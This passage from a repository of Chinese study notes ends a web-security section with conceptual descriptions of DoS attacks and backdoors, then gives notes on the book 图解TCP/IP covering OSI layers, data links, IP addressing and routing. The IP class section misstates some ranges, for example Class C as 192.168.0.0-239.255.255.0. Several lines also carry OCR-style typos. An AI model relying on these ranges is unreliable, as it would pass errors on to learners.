1873 | - 集中利用访问请求造成资源过载，资源用尽的同时，实际上服务也就呈停止状态。 
1874 | - 通过攻击安全漏洞使服务停止。 其中，集中利用访问请求的 DoS 攻击，单纯来讲就是发送大量的合法请求。服务器很难分辨何为正常请求，何为攻击请求，因此很难防止 DoS 攻击。
1875 | 
1876 | 多台计算机发起的 DoS 攻击称为 DDoS 攻击（Distributed Denial ofService attack）。DDoS 攻击通常利用那些感染病毒的计算机作为攻击者的攻击跳板。
1877 | 
1878 | **10.5.4 后门程序**
1879 | 
1880 | 后门程序（Backdoor）是指开发设置的隐藏入口，可不按正常步骤使用受限功能。利用后门程序就能够使用原本受限制的功能。
1881 | 
1882 | 通常的后门程序分为以下 3 种类型。 
1883 | 
1884 | - 开发阶段作为 Debug 调用的后门程序
1885 | - 开发者为了自身利益植入的后门程序
1886 | - 攻击者通过某种方法设置的后门程序
1887 | 
1888 | 可通过监视进程和通信的状态发现被植入的后门程序。但设定在 Web 应用中的后门程序，由于和正常使用时区别不大，通常很难发现。


--------------------------------------------------------------------------------
/Network/TCP&IP.md:
--------------------------------------------------------------------------------
   1 | - [图解 TCP/IP 笔记](#图解-tcpip-笔记)
   2 |   - [第一章 网络基础知识](#第一章-网络基础知识)
   3 |     - [1.3 协议](#13-协议)
   4 |     - [1.5 协议分层与OSI参考模型](#15-协议分层与osi参考模型)
   5 |     - [1.7 传输方式的分类](#17-传输方式的分类)
   6 |     - [1.8 地址](#18-地址)
   7 |     - [1.9 网络的构成要素](#19-网络的构成要素)
   8 |     - [1.10 现代网络时态](#110-现代网络时态)
   9 |   - [第二章 TCP/IP 基础知识](#第二章-tcpip-基础知识)
  10 |     - [2.4 TCP/IP 基础模型](#24-tcpip-基础模型)
  11 |     - [2.5 TCP/IP 分层模型通信实例](#25-tcpip-分层模型通信实例)
  12 |   - [第三章 数据链路](#第三章-数据链路)
  13 |     - [3.1 数据链路的作用](#31-数据链路的作用)
  14 |     - [3.2 数据链路相关技术](#32-数据链路相关技术)
  15 |     - [3.3 PPP](#33-ppp)
  16 |   - [第四章 IP 协议](#第四章-ip-协议)
  17 |     - [4.1 IP 即网络协议](#41-ip-即网络协议)
  18 |     - [4.2 IP 基础知识](#42-ip-基础知识)
  19 |     - [4.3 IP 地址基础知识](#43-ip-地址基础知识)
  20 |     - [4.4 路由控制](#44-路由控制)
  21 |     - [4.6 IPv6](#46-ipv6)
  22 |   - [第五章 IP 协议相关技术](#第五章-ip-协议相关技术)
  23 |     - [5.2 DNS](#52-dns)
  24 |     - [5.3 ARP](#53-arp)
  25 |     - [5.4 ICMP](#54-icmp)
  26 |     - [5.5 DHCP](#55-dhcp)
  27 |     - [5.6 NAT](#56-nat)
  28 |     - [5.7 IP 隧道](#57-ip-隧道)
  29 |   - [第六章 TCP与UDP](#第六章-tcp与udp)
  30 |     - [6.1 传输层的作用](#61-传输层的作用)
  31 |     - [6.2 端口号](#62-端口号)
  32 |     - [6.3 UDP](#63-udp)
  33 |     - [6.4 TCP](#64-tcp)
  34 |     - [6.6 UDP 首部的格式](#66-udp-首部的格式)
  35 |     - [6.7 TCP 首部格式](#67-tcp-首部格式)
  36 |   - [第七章 路由协议](#第七章-路由协议)
  37 |     - [7.1 路由控制的定义](#71-路由控制的定义)
  38 |     - [7.4 RIP](#74-rip)
  39 |     - [7.5 OSPF](#75-ospf)
  40 |     - [7.6 BGP](#76-bgp)
  41 |   - [第八章 应用协议](#第八章-应用协议)
  42 |     - [8.1 应用层协议概要](#81-应用层协议概要)
  43 |     - [8.2 远程登录](#82-远程登录)
  44 |     - [8.3 文件传输](#83-文件传输)
  45 |     - [8.4 电子邮件](#84-电子邮件)
  46 |     - [8.5 WWW](#85-www)
  47 |     - [8.6 网络管理](#86-网络管理)
  48 |   - [第九章 网络安全](#第九章-网络安全)
  49 |     - [9.1 TCP/IP 与网络安全](#91-tcpip-与网络安全)
  50 |     - [9.2 网络安全构成要素](#92-网络安全构成要素)
  51 |     - [9.3 加密技术基础](#93-加密技术基础)
  52 |     - [9.4 安全协议](#94-安全协议)
  53 | 
  54 | - **相关资源**
  55 |   - 书籍资源: [Information_Security_Books/073图解TCP_IP_第5版](https://github.com/olist213/Information_Security_Books/tree/main/073%E5%9B%BE%E8%A7%A3TCP_IP_%E7%AC%AC5%E7%89%88)
  56 |   - 精简版1: [五万字，快速读完《图解TCP/IP》核心内容](https://blog.csdn.net/qq_59392324/article/details/120698235)
  57 |   - 精简版2: [网络另一篇干货《图解TCP/IP》-封顶大吉【值得收藏】 - 掘金](https://juejin.cn/post/6928280495310503944)
  58 | - **拓展阅读**
  59 |   - [巩固你的网络底层基础，再不怕被问TCP/IP/UDP - 掘金](https://juejin.cn/post/6994274756652433421)
  60 |   - [一篇文章带你熟悉 TCP/IP 协议（网络协议篇二） - 掘金](https://juejin.cn/post/6844903510509633550)
  61 | 
  62 | # 图解 TCP/IP 笔记
  63 | 
  64 | ## 第一章 网络基础知识
  65 | 
  66 | ### 1.3 协议
  67 | 
  68 | 在计算机网络与信息通信领域里，人们经常提及“协议”一词。**互联网常用的具有代表性的协议有IP,TCP,HTTP等**。
  69 | 
  70 | “计算机网络体系结构”将这些网络协议进行了系统的归纳。TCP/IP就是IP,TCP,HTTP等协议的集合。可用于互联网和局域网。
  71 | 
  72 | 简单来说，**协议就是计算机与计算机之间通过网络实现通信时实现达成的一种“约定”**。这种“约定”使那些由不同厂商的设备，不同的CPU以及不同的操作系统组成的计算机之间，只要遵循相同的协议就能够实现通信。
  73 | 
  74 | **分组交换**是指将大数据分割为一个个的叫包（Packet）的较小单位进行传输的方法。这里所说的包，如同我们平常在邮局里见到的邮包。分组交换就是将大数据分装为一个个这样的邮包交给对方。
  75 | 
  76 | ### 1.5 协议分层与OSI参考模型
  77 | 
  78 | **OSI模型将通讯协议中必要的协议分为7层**。通过这些分层，使得那些复杂的网络协议更加简单化。
  79 | 
  80 | 在分层中，**每个分层都接收由它下一层所提供的特定服务，并且负责为自己的上一次提供特定的服务**。上下层之间进行交互时所遵循的约定叫做“**接口**”，同一层之间的交互所遵循的约定叫做“**协议**”。
  81 | 
  82 | **各个分层的作用** 
  83 | 
  84 | - **应用层**：**为应用程序提供服务**并**规定**应用层程序中**通信**相关的**细节**。包括文件传输，电子邮件，远程登录(虚拟终端)等协议。
  85 | - **表示层**：**将应用处理的信息转换为**适合**网络传输的格式**, 或将来自下一层的数据转按为上层能够处理的格式。因此它主要**负责数据格式的转换**。
  86 | 	具体来说,就是将设备固有的数据格式转换为网络标准传输格式。不同设备对同一比特流解释的结果可能会不同。因此,使它们保持一致是这一层的主要作用。
  87 | - **会话层**：负责**建立和断开通信连接**(数据流动的運辑通路),以及**数据的分割**等数据**传输**相关的**管理**。
  88 | - **传输层**：起着**可靠传输**的作用。只在**通信双方节点上进行处理**,而无需在路由器上处理。
  89 | - **网络层**：将数据传输到目标地址。目标地址可以是多个网络通过路由器连接而成的某一个地址。因此这一层主要负责寻址和路由选择。
  90 | - **数据链路层**：负责**物理层**面上**互连**的、**节点之间**的**通信传输**。例如与1个以太网相连的2个节点之间的通信。将0、1序列划分为具有意义的数据桢传送给对端(数捆桢的生成与接收)。
  91 | - **物理层**：负责0、1**比特流**(0、1序列)与**电压**的高低、光的**闪灭**之间的**互换**。
  92 | 
  93 | ### 1.7 传输方式的分类
  94 | 
  95 | 通过网络发送数据，大致可分为**面向有连接**与**面向无连接**两种类型。
  96 | 
  97 | **面向有连接型** 中，在发送数据之前，需要在收发主机之前连接一条通信线路。面向有连接型就好像人平常打电话，输入完对方电话号码播出之后，只有对方端拿起电话才是真正通话。
  98 | 
  99 | **面向无连接型**则不要求建立和断开连接。**发送端可于任何时间发送数据**，接收端则永远不知道自己会在何时从哪里接收数据，因此，**接收端需要**时常**确认是否收到了数据**。
 100 | 
 101 | 目前，网络通信方式大致分为两种——**电路交换**和**分组交换**。
 102 | 
 103 | 网络通信当中，也可以根据目标地址的个数及后续的行为对通信进行分类。如广播多播就是这种分类的产物。
 104 | 
 105 | 分为单播，广播，多播，任播。
 106 | 
 107 | **单播**：比如早先的固定电话，1对1通信。
 108 | 
 109 | **广播**：典型例子就是电视播放，将电视信号一齐发送非非特定的多个接受对象。
 110 | 
 111 | **多播**：和广播类似，不同的是要限定某一组主机为接收端。
 112 | 
 113 | **任播**：在特定的多台主机中选出一台作为接受端。
 114 | 
 115 | ### 1.8 地址
 116 | 
 117 | **一个地址必须明确地表示一个主体对象**，在同一个通信网络中不允许由两个相同地址的通信主体存在，这就是地址的**唯一性**。 
 118 | 
 119 | 当地址总数越来越多时，如何高效的从中找出通信的目标地址成为一个重要的问题。为此人们发现地址除了具有唯一性还需要具有**层次性**。
 120 | 
 121 | ### 1.9 网络的构成要素
 122 | 
 123 | **网卡**。任何一台计算机连接网络时，必须使用网卡（全称是网络接口卡）。网络接口卡（NIC）有时也被叫做网络适配器，网卡，LAN卡。
 124 | 
 125 | **中继器**———是OSI模型的第一层，**物理层**面延长网络的设备。由电缆传来的电信号或光信号经由中继器的波形调整和放大再传给另一个电缆。
 126 | 
 127 | **网桥/2层交换机**在OSI模型的第2层———**数据链路层面**上连接两个网络的设备。它能够识别数据链路层的数据帧（与分组数据意思大致相同，但是在数据链路层习惯称为帧），并将这些数据帧临时储存于内存，再重新生成信号作为一个全新的帧转发给另一个网段。
 128 | 
 129 | **路由器/3层交换机** 是在OSI模型的第3层———**网络层**面连接两个网络，并对分组报文进行转发的设备。网桥是根据物理地址（MAC地址）进行处理，而路由器/3层交换机则是根据IP地址进行处理的。路由器可以连接到不同的数据链路。
 130 | 
 131 | **4~7层交换机** 负责处理OSI模型中从**传输层到数据层的数据**。如果有TCP/IP分层模型，4~7层交换机就是以TCP等协议的传输层机器上面的应用层为基础，分析收发数据，并对其进行特定的处理。
 132 | 
 133 | **网关**是OSI模型中负责**从传输层到应用层的数据进行转换和转发**的设备。网关不仅转发数据还对数据进行转换，它通常会使用一个表示层或应用层网关，在两个不能进行直接通信的协议之间通信，最终实现两者之间的通信。
 134 | 
 135 | ### 1.10 现代网络时态
 136 | 
 137 | 我们以交通道路为例说明现实当中的网络配置。
 138 | 
 139 | 高速公路的 “骨干” 或 “核心” 相当于**计算机网络的中心**（核心网、骨干网），人们通常选用高速路由器相互连接使之快速传递大量数据。
 140 | 
 141 | 网络中相应于高速公路出入口的部分被称为 **“边缘网络”**（网络边界） ，常用的设备有**多功能路由器和3层交换机**。
 142 | 
 143 | 高速公路出入口连接出国道，省道，从而可以直接通往市区街道对应计算机网络中连接 “边缘网络” 的部分叫做 “**接入层**” 或 “**汇聚层**” 。
 144 | 
 145 | ## 第二章 TCP/IP 基础知识
 146 | 
 147 | ### 2.4 TCP/IP 基础模型
 148 | 
 149 | **硬件 (物理层):** TCP/IP的最底层是**负责数据传输的硬件**，相当于以太网或电话线路等物理层的设备。
 150 | 
 151 | **网络接口层 (数据链路层):** 网络接口层是**利用以太网中的数据链路进行通信**，因此属于接口层。也就是说，把它当作让NIC起作用的“驱动程序”也无妨。计算机添加外设或拓展卡需要相应驱动的支持。因此，人们常常还需要在操作系统的基础上安装一些驱动软件以便使用这些附加硬件。
 152 | 
 153 | **互联网层 (网络层):** 互联网层 **使用 IP 协议**，相当于OSI模型中的第3层网络层。IP协议基于IP地址转发分包数据。
 154 | 
 155 | **传输层:** 传输层最主要的功能就是能够**让应用程序之间实现通信**，计算机内部通常同一时间运行着多个程序，为此，必须分清是哪些程序与哪些程序在进行通信，识别这些应用程序的是**端口号**。
 156 | 
 157 | - **TCP**: TCP是一种**面向有连接的传输层协议**，它可以保证两端通信主机之间的通信可达。 TCP 能够正确 **处理在传输过程中丢包、传输顺序乱掉等异常情况** 。此外, TCP 还能够有效利用带宽,缓解网络拥堵。然而,为了建立与断开连接,有时它需要至少7次的发包收包,导致网络流量的浪费。此外,为了提高网络的利用率, TCP 协议中定义了各种各样复杂的规范,因此不利于视频会议(音频、视频的数据量既定)等场合使用。
 158 | - **UDP**：UDP和TCP不同，它是一种**面向无连接的传输层协议**，因为面向无连接的特性，UDP不会关注对端是否真的收到了数据，可以在应用程序中实现此功能。UDP常用于分组数据较少或多播，广播通信以及视频通信等多媒体领域。
 159 | 
 160 | **应用层（会话层以上的分层）** TCP/IP的分层中，将OSI模型中**会话层**，**表示层**和**应用层**的功能都集中到了**应用程序来实现**。
 161 | 
 162 | **TCP/IP 应用的架构** 绝大多数属于 **客户端/服务端**模型，**提供服务的程序叫服务端**，**接收服务的程序叫客户端**。在这种通信模式中，**提供服务的程序**会预先被**部署到主机**上，等待接收任何时刻客户可能发送的要求。客户端可以随时发送请求给服务端，有时服务端可能会有处理异常，超出负载等情况，这时客户可以在等待片刻后重发一次请求。
 163 | 
 164 | - WWW（万维网）可以说是互联网能够如此普及的一个重要原动力。用户在一种叫做游览器的软件上借助鼠标和键盘就可以轻轻松松地在网上冲浪（从今天来看，这个解释真的感觉好古老~)。浏览器和服务端通信使用的 **协议** 是 **HTTP** ，所传输数据的主要格式是**HTML**。WWW中的 **HTTP属于OSI应用层的协议** ，而 **HTML属于表示层** 的协议。
 165 | 
 166 | - 电子邮件：电子邮件就是在网络上发送信件，发送电子邮件用到的协议叫做**SMTP**。最初，人们只能发送文本格式的电子邮件，但现在，电子邮件格式由**MIME**协议拓展以后，就可以发送声音，图像等各式各样的信息，甚至修改邮件文字的大小，颜色。
 167 | 
 168 | - 文件传输（FTD）：文件传输是指将保存在其他计算机硬盘上的文件转移到本地的硬盘上，或将本地硬盘的文件传送到其他机器硬盘上的意思。该过程使用的协议叫做**FTP**，FTP很早就已经投入使用，传输过程中可以选择用二进制还是文本方式。在FTP中进行文件传输时会建立两个TCP连接，分别是发出传输请求时所要用到的控制连接与实际传输数据时所要用到的连接。（属于OSI**会话层**的功能）
 169 | 
 170 | - 远程登陆（TELNET与SSH）：远程登陆是指登录到远程的计算机上，使那台计算机上的程序得以运行的一种功能。TCP/IP网络中远程登陆常用**TELNET**与**SSH**两种协议。
 171 | 
 172 | - 网络管理（SNMP)：TCP/IP 中进行**网络管理**时，采用 SNMP 协议。使用SNMP管理的主机，网桥，路由器等称作SNMP代理，而进行管理的那一段叫做管理器，SNMP正是这个管理器和代理所要用的协议。在 SNMP 的代理端,保存着网络接口的信息、通信数据量、异常数据量以及 设备温度等信息。这些信息可以通过 MIB ( Management Information Base )访问。因此,在 TCP / IP 的网络管理中, SNMP 属于应用协议, MIB 属于表示层协议。一个网络范围越大,结构越复杂,就越需要对其进行有效的管理。而 SNMF 可以让管理员及时检查网络拥堵情况,及早发现故障,也可以为以后扩大网络收集必要的信息。
 173 | 
 174 | ### 2.5 TCP/IP 分层模型通信实例
 175 | 
 176 | **每个分层**中，都会对所发送的数据**附加一个首部**，包含了该层必要的信息，如发送的目标地址以及协议相关信息。通常，为协议提供的信息是包首部，所要发送的内容是数据。
 177 | 
 178 | **论包、帧、数据报、段、消息**
 179 | 
 180 | **包**可以说是全能性述语。**帧**用于表示数据链路层中**包的单位**。而**数据报**是 **I** 和 **UDP** 等网絡层以上的分层中包的单位。**段**则表示 TCP 数据流中的**信息**。最后,**消息**是指应用协议中**数据的单位**。
 181 | 
 182 | **经过数据链路的包**
 183 | 
 184 | 每个**包首部**中至少都会包含两个信息：一个是**发送端和接收端的地址**，另一个是**上一层的协议类型**。
 185 | 
 186 | 经过每个协议分层时，都必须有识别包发送端和接收端的信息。**以太网**会用**MAC**地址，**IP**会用**IP地址**，而**TCP/UDP**会用**端口号**作为识别两端主机的地址。
 187 | 
 188 | 此外，**每个分层**的**包首部**中还包含一个**识别位**，它是用来**标识上一层协议的种类信息**，例如**以太网**的包首部中的**以太网类型**，**IP**中的**协议类型**以及**TCP/IP**中**两个端口的端口号**等都起着标识协议类型的作用。
 189 | 
 190 | ## 第三章 数据链路
 191 | 
 192 | ### 3.1 数据链路的作用
 193 | 
 194 | **数据链路**，指的是OSI参考模型中的**数据链路层**，有时也指**以太网**，**无线局域网等通信手段**。
 195 | 
 196 | **数据链路层的段**是指一个被分割的网络，根据使用者的不同，含义也不禁相同。
 197 | 
 198 | **网络拓朴**
 199 | 
 200 | 网络的连接和构成的形态称为网络拓扑，网络拓扑包括总线型，环型，星型，网状型等。拓扑一词不仅适用于直观可见的配线方式上，也用于逻辑上网络的组成结构，两者有时可能不一致。
 201 | 
 202 | ### 3.2 数据链路相关技术
 203 | 
 204 | **3.2.1 MAC地址**
 205 | 
 206 | MAC地址用于识别数据链路中互联的节点。
 207 | 
 208 | MAC地址长48比特，在使用网卡（NIC）的情况下，MAC地址一般会被烧入到ROM中，因此，任何一个网卡的MAC地址都是唯一的。
 209 | 
 210 |  关于厂商识别码，每个NIC厂商都有特定唯一的识别数字。
 211 | 
 212 | > 在全世界，MAC地址也并不总是唯一的，实际上，即使MAC地址相同，只要不是同属同一个数据链路就不会出现问题。
 213 | 
 214 | 从通信介质的使用方法来看，网络可分为**共享介质层**和**非共享介质层**。
 215 | 
 216 | **共享介质层** 是指多个设备共享一个通信介质的一种网络（以太网，FDDI）。设备之间使用同一个载波信息进行发送与接收，并有必要对介质进行控制访问。
 217 | 
 218 | 有两种介**质访问控制方式**：一种是**争用方式**，另一种是**令牌传递方式**。
 219 | 
 220 | - **争用方式** 是指争夺数据传输的权力，也叫CSMA（载波监听多路访问），这种方式令网络的各个站（节点）采用先到先得的方式占用信道发送数据，如多个站同时发送帧，则会产生冲突现象。
 221 | - **令牌传递方式** 是沿着令障环发送一种叫做“令牌”的特殊报文,是控制传输的一种方式。只有获得令牌的站オ能发送数据。这种方式有两个特点: 一是不全有冲突,二是每个站都有通过平等循环获得令牌的机会。因此,即使网络拥堵也不会导致性能下降。
 222 | 
 223 | **非共享介质网络**  不共享介质，是对介质采用专用的一种传输控制方式。在这种方式下，每个站直连交换机，由交换机负责转发数据帧。
 224 | 
 225 | **根据MAC地址转发**
 226 | 
 227 | 在使用同轴电缆的以太网(10BASE5、10BASE2)等介质共享网络中,同一时间只能有一台主机发送数据。当连网的主机数量增加时,通信性能会明显下降。若将集线器或集中器等设备以星型连接,就出现了一款新的网络设备一交換集线器,这是一种将非介质共享型网络中所使用的交換机用在以太网中的技术,交换集线器也叫做以太网交换机。
 228 | 
 229 | 以太网交换机就是持有多个端口”的网桥。它们根据數据链路层中每个帧的目标 MAC 地址,决定从哪个网络接口发送数据。这时所参考的、用以记录发送接口的就叫做转发表( Forwarding Table )。
 230 | 
 231 | **环路检测技术**
 232 | 
 233 | 通过网桥连接网络时,一且出现环路该如何处理?这与网络的拓扑结构和所使用的网桥种类有直接关系。最坏的情况下,数据帧会在环路中被一而再再而三地持续转发。而一且这种数据帧越积越多将会导致网络瘫痪。
 234 | 
 235 | 解决网络中的环状问题，具体有生成树和源路由两种方式。只要搭建合适的网桥，在发生某一处路由故障时绕行，可以提高容灾能力。
 236 | 
 237 | - 生成树方式: 每个网桥必须在每1~10秒内相互交换BPDU包，从而判断哪些端口使用哪些不使用，以便消除环路。一旦发生故障就会自动切换通信线路，利用那些没有被使用的端口继续进行传输。
 238 | - 源路由法: 源路由法最早由IBM提出，以解决令牌环网络问题。该办法可以判断发送数据的源地址是通过哪个网桥实现传输的，并将帧写入RIF。网桥则根据这个RIF信息发送帧给目标地址。在这种机制中发送端本身必须具备源路由的功能。
 239 | 
 240 | **VLAN**
 241 | 
 242 | 进行网络管理的时候,时常会遇到分散网络负载、变换部署网络设备的位置等情况。而有时管理员在做这些操作时,不得不修改网络的拓扑结构,这也就意味着必须进行硬件线路的改造。然而,如果采用带有 VLAN 技术的网桥,就不用实际修改网络布线,只需修改网络的结构即可。
 243 | 
 244 | ### 3.3 PPP
 245 | 
 246 | PPP是点对点，即1对1的协议。PPP相当于OSI模型第二层的**数据链路层**。
 247 | 
 248 | **PPP的帧格式**
 249 | 
 250 | 其中标识符用来区分每个帧，PPP是基于HDLC，HDLC就是在每个帧的前后加上一个8位字节“01111110”用来区分帧。
 251 | 
 252 | **PPPoE**
 253 | 
 254 | 有些互联网接入服务商在以太网上利用PPPoE提供PPP功能。
 255 | 
 256 | 在这种互联网接人服务中,通信线路由以太网模报。由于以太网越来越普及在加上它的网络设备与相应的 NIC 价格比较便宜,因而 ISP 能够提供一个单价更低的互联网按人服务。
 257 | 
 258 | 单纯的以太网没有验证功能,也没有建立和断开连接的处理,因此无法按时计费。而如果果用 PPPoE 管理以太网连接,就可以利用 PPP 的验证等功能使各家 ISP 可以有效地管理终端用户的使用。
 259 | 
 260 | ## 第四章 IP 协议
 261 | 
 262 | ### 4.1 IP 即网络协议
 263 | 
 264 | TCP/IP的心脏是互联网层，这一层主要由**IP**和**ICMP**两个协议组成，本章仅对IP协议进行详细说明。目前的IP4已经无法应对互联网的需求，于是出现了更高版本的IP6。
 265 | 
 266 | **IP相当于OSI模型的第3层**
 267 | 
 268 | IP相当于OSI参考模型的第3层——网络层。
 269 | 
 270 | **网络层**的主要功能是“**实现终端节点之间的通信**”，这种终端节点之间的通信也叫“**点对点通信**”。
 271 | 
 272 | 从上一章知道，**数据链路层**的主要作用是**在互联同一种数据链路的节点之间进行包传输**。而一旦跨越多种数据链路，就需要借助网络层。
 273 | 
 274 | **主机与节点**
 275 | 
 276 | 在互联网世界中,将那些配有 IP 地址的设备叫做“主机”。这里的主机可以是超大型计算机,也可以是小型计算机。这是因为互联网在当初刚发明的时候,只能连接这类大型的想势设备,因此习慣上将配有 IP地址的设备称为“主机”。
 277 | 
 278 | 然而,准确地说,主机的定义应该是指“配置有 IP 地址,但是不进行路由控制＂的设备”。既配有 IP 地址又具有路由控制能力的设备叫做“路由器”,跟主机有所区别。而**节点**则是主机和路由器的统称”。
 279 | 
 280 | **网络层和网络链路层的关系**
 281 | 
 282 | 数据链路层提供直连两个设备之间的通信功能，网络层的IP则负责在没有直连的两个网络之间进行通信传输，它们的区别又是什么呢？
 283 | 
 284 | 就好像我们坐火车或飞机旅游，每张票只能在某一限定区间内移动。此处的 “**区间内**” 就如同通信网络上的**数据链路**，而这个区间内的**出发地点和目的地点**就如同某一个数据链路的**源地址和目标地址**等首部信息。整个全程的**行程表**的作用就相当于**网络层**。
 285 | 
 286 | ### 4.2 IP 基础知识
 287 | 
 288 | IP大致分为三大作用模块，它们是**IP寻址**，**路由**（最终节点为止的转发），以及**IP分包与组包**。
 289 | 
 290 | 通信中为了实现通信对端，必须要有一个类似于地址的识别码进行标识，MAC是标识同一种链路中不同计算机的一种识别码。网络层的IP也有这种地址信息，一般也叫IP地址。IP地址用于在“连接到网络中的所有主机识别出进行通信的目标地址”。因此，在**TCP/IP通信中**所有主机或路由器**必须设定自己的IP地址**
 291 | 
 292 | 不论主机与哪种数据链路层连接，其IP地址的形式都保持不变。另外，在网桥或交换集线器等物理层设备中，不需要设置IP地址。
 293 | 
 294 | **路由控制** 
 295 | 
 296 | 将分组数据发送到最终目标地址的功能。一旦这个路由控制的运行出现异常，分组数据极有可能“迷失”，无法到达目标地址。因此，一个数据包之所以能够成功地到达最终地目标地址，全靠路由控制。
 297 | 
 298 | **多跳路由**
 299 | 
 300 | Hop 译为中文叫“跳”。它是指网络中的一个区间。IP包正是在网络中一个个跳间被转发。因此路由也叫做**多跳路由**。在每一个区间内决定着包在下一跳被转发的路径。
 301 | 
 302 | 多跳路由是指路由器或主机在转发 IP 数据包时只指定下一个路由器或主机,而不是将到最终目标地址为止的所有通路全都指定出来。因为每一个区间(跳)在转发 IP 数据包时会分别指定下一跳的操作,直至包达到最终的目标地址。如图,以乘坐火车旅游为例具体说明
 303 | 
 304 | **路由控制表**
 305 | 
 306 | 为了将数据包发给目标主机,所有主机都维护着一张路由控制表( **Routing Table** )。该表**记录** IP 数据在**下一步应该发给哪个路由器**。IP包将根据这个路由表在各个数据链路上传输。
 307 | 
 308 | **数据链路的抽象化**
 309 | 
 310 | IP是实现多个数据链路之间通信的协议，数据链路根据种类的不同各有特点，对这些不同的数据链路的相异特性抽象化也是IP的重要作用之一。
 311 | 
 312 | **IP属于面向无连接型**
 313 | 
 314 | IP 采用面向无连接主要有两点原因; 一是为了简化,二是为了提速。面向连接比起面向无连技处理相对复杂。甚至管理每个连接本身就是一个相当紧琐的事情。此外,每次通信之前都要事先建立连淡,又会降低处理速皮。需要有连接时,可以委托上一层提供此项服务。因此, I 为了实现简单化与高速化采用面向无连接的方式。
 315 | 
 316 | ### 4.3 IP 地址基础知识
 317 | 
 318 | 用 TCP / IP 通信时,用 IP 地址识别主机和路由器。为了保证正常通信,有必要为每个设备配置正确的 IP 地址。在互联网通信中,全世界都必须设定正确的 IP 地址。否则,根本无法实现正常的通信。因此, **IP 地址就像是 TCP / IP 通信的一块基石**。
 319 | 
 320 | **IP地址的定义**
 321 | 
 322 | IPv4地址由**32位正整数**来表示，TCP/IP通信要求将这样的IP地址分配给每一个参与通信的主机。IP地址在计算机内部以二进制方式被处理，然而人类并不习惯采用二进制方式，需要采用一种特殊的标记方式，那就是将32位的IP地址以每8位为一组分为四组，每组以“.”隔开，再将每组数转换为十进制数。
 323 | 
 324 | **IP地址由网络和主机两部分组成** 
 325 | 
 326 | 网络标识在数据链路的每个段配置不同的值，必须保证连接的每个段的地址不相重复。而相同段内相连的主机必须有相同的网络地址，IP地址的“主机标识‘则不允许在同一个网段内重复出现。
 327 | 
 328 | 也因此，可以通过设置**网络地址**和**主机地址**，在相互连接的整个网络中保证每台主机的IP都不会重叠，即IP有了**唯一性**。
 329 | 
 330 | **IP地址的分类**
 331 | 
 332 | IP地址分为A类，B类，C类，D类 四类。根据IP地址中第1位到第4位的比特对其网络标识和主机识别进行区分。
 333 | 
 334 | - A类IP地址: 首位以“0”开头的地址。从第1位到第8位是它的网络标识用十进制表示的话, 0.0.0.0-127.0.0.0是 A 类的网絡地址。 A 类地址的后24位相当于主机标识。因此,一个两段内可容纳的主机地址上限为16,777,214个。
 335 | - B 类 IP 地址: 前两位为“10”的地址。从第1位到第16位’是它的网络标识。用十进倒表示的话，128.0.0.1~191.255.0.0是 B 类的网络地址。 B 类地址的后16位相当于主机标识。因此,一个网段内可容纳的主机地址上限为65,534个＂。
 336 | - C 类护地址: 前三位为“110”的地址。从第1位到第24位是它的网络标识。用十进制表示的话,192.168.0.0-239.255.255.0是 C 类的网络地址。 C类地址的后8位相当于主机标识。因此,一个网段内可容纳的主机地址上限为254个。
 337 | - D类护地址: 前四位为“1110”的地址。从第1位到第24位是它的网络标识。用十进制表示的话,224.0.0.0-239.255.255.255是 D 类的网絡地址。D 类地址没有主机标识,常被用于多播。
 338 | 
 339 | **广播地址**
 340 | 
 341 | 广播地址用于在同一个链路中相互连接的主机之间发送数据包，IP地址中的主机地址部分全部设置为1，就成了广播地址。 
 342 | 
 343 | 广播分为**本地广播**和**直接广播**。在本网络内的叫做本地广播，在不同网络之间的广播叫做直接广播。
 344 | 
 345 | **IP多播**
 346 | 
 347 | 多播用于将包发送给特定组内的所有主机，由于其直接使用IP协议，因此也不存在可靠传输。
 348 | 
 349 | **IP多播与地址**
 350 | 
 351 | 多播使用D类地址，因此如果从首位开始到第4位是”1110“，就可以认为是多播地址，而剩下的28位可以成为多播的组编号。
 352 | 
 353 | **子网与子网掩码**
 354 | 
 355 | 现在,一个IP地址的网络标识和主机标识已不再受限于该地址的类别,而是由一个叫做“**子网掩码**”的识别码通过子网网络地址细分出比 A 类、B 类、C 类更小粒度的网络。这种方式实际上就是将原来 A 类、B 类 ，C 类等分类中的主机地址部分用作子网地址,可以将原网络分为多个物理网络的一种机制。自从引人了子网以后,一个 IP 地址就有了**两种识别码**。一是IP地址本身，另一个是表示网络部的子网掩码。子网掩码用二进制方式表示的话,也是一个32位的数字。它对应**IP地址网络标识部分的位全都为“1”**，对于**IP 地址主机标识的部分则全部为“0”**。由此,一个IP地址可以不再受限于自己的类别,而是可以用这样的子网掩码自由地定位自己的网络标识长度。当然,子网掩码必须是IP地址的首位开始连续的"1".
 356 | 
 357 | **全局网络和私有网络**
 358 | 
 359 | 起初，互联网中的任何一台主机或路由都必须配一个唯一的IP地址，可随着互联网的发展，如果采用唯一地址的话，会有IP地址耗尽的风险。于是出现了一种新技术，只要求在必要的时候为相应数量的设备分配唯一的IP地址。
 360 | 
 361 | 每个独立的网络各自设置IP地址也可能存在问题，于是出现了私有网路的IP地址, 如下
 362 | 
 363 | - A: 10.0.0.0~10.255.255.255 即 10.0.0.0/8
 364 | - B: 172.16.0.0~172.31.255.255 即 172.16.0.0/12
 365 | - C: 192.168.0.0~192.168.255.255 即 192.168.0.0/16
 366 | 
 367 | ### 4.4 路由控制
 368 | 
 369 | 发送数据包所使用的地址是网络层的地址，即IP地址。仅有IP地址还不足以实现将数据包发送到对端目标地址，在数据发送中还需要有类似于“指明路由器或主机”的信息，以便发往目标地址。保存这种信息的就是**路由控制表**，实现IP通信的主机和路由器都必须持有一张这样的表。
 370 | 
 371 | 路由控制表的形成方式有两种：一种是**管理员手动设置**，另一种是路由器与其他路由器相互交换信息时**自动刷新**。
 372 | 
 373 | 该表是由一个叫做“**路由协议**”的协议制作而成。
 374 | 
 375 | **IP地址与路由控制**
 376 | 
 377 | IP地址的网络地址部分用于进行路由控制。
 378 | 
 379 | 路由控制表记录着网络地址与下一步应该发送至路由器的地址。
 380 | 
 381 | - 默认路由: 如果一张路由表中包含所有的网络及其子网的信息，将会造成无端的浪费，这是默认路由是很好的选择，默认路由是指**路由表中任何一个地址都能与之匹配的记录**。
 382 | - 主机路由: “IP地址/32”被称为主机路由，它的意思是整个IP地址的所有位都将参与路由，意味着要**基于主机上网卡上配置的IP地址**本身，而不是基于该地址的网络地址部分进行路由。
 383 | - 环回地址: 环回地址是在同一台计算机上的程序之间进行网络通信时所使用的一个默认地址。
 384 | 
 385 | **路由控制表的聚合（路由汇总）**
 386 | 
